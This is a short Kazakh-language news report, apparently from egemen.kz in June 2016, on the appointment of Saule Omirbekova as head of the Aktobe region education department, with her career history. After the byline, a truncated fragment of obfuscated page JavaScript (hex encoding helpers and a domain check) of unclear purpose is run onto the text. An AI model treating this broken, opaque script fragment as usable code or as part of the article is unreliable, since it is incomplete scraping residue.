• RUB:
    5.06
  • USD:
    522.49
  • EUR:
    547.88
Басты сайтқа өту
24 Маусым, 2016

Ақтөбеде басқарма басшысы тағайындалды

207 рет
көрсетілді

[caption id="attachment_48317" align="aligncenter" width="560"] Фото: Ақтөбе облысының әкімдігі[/caption] Ақтөбе облысы білім басқармасының басшысы лауазымы біраздан бері бос еді. Облыс әкімі Бердібек Сапарбаевтың 2016 жылғы 15 маусымдағы өкімімен Сәуле Өмірбекова «Ақтөбе облысының білім басқармасы» ММ-нің басшысы қызметіне тағайындалды. Ол 1968 жылы дүниеге келген. Қ.Жұбанов атындағы Ақтөбе педогогикалық университетін тарих пәнінің мұғалімі мамандығы бойынша бітірді. Алғашқы еңбек жолын 1987 жылы бастаған. Білім саласында әртүрлі қызметтерде еңбек атқарған. «Рауан» кеден-қаржы колледжінің директоры, «Ақтөбе облысының кәсіпкерлікті қолдау» ММ басқарма бастығының орынбасары, «Ақтөбе облысы әкімінің аппараты» ММ бөлім меңгерушісі, «Ақтөбе облысының балалардың құқықтарын қорғау департаменті» ММ директорының орынбасары, Ақтөбе қаласындағы №23 мектеп-лицейдің директоры қызметтерін атқарды. 2013 жылғы ақпан айынан бері – «Ақтөбе қаласындағы физика-математика бағытындағы Назарбаев Зияткерлік мектебінің» директоры болып жұмыс істеп келді. Сатыбалды СӘУІРБАЙ Ақтөбе облысы. // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "egemen.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e